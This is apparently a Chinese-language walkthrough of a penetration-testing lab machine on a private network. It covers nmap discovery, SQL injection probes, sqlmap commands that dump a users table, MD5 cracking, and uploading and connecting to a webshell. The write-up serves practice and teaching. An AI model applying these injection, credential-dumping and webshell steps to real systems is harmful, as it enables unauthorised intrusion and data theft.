信息搜集:
kali: 192.168.116.129
nmap扫描:
nmap -sP 192.168.116.0/24
靶机ip: 192.168.116.128
使用了御剑进行目录扫描:
kali扫描端口:
访问http80端口:
我们选择注册:
登录:
点击search
尝试sql注入:
Windows OS' and 1=1#
Windows OS' and 1=2#
这靶场怎么加载这么慢啊
Windows OS 这个有注入点 使用sqlmap:
将请求包复制->1.txt->在注入点添加一个 * 号
python sqlmap.py -r 1.txt --dbs --batch
得到库名:
查看表名:
python sqlmap.py -r 1.txt -D webapphacking --tables --batch
下载:
python sqlmap.py -r 1.txt -D webapphacking -T users --dump --batch
得到md5加密的密码和账号
md5解密:
尝试登录管理员:
发现一个文件上传:
尝试上传木马:
上传的目录在 刚才目录扫描的时候 扫出来的
http://192.168.116.128/uploads/
使用蚁剑连接:
成功!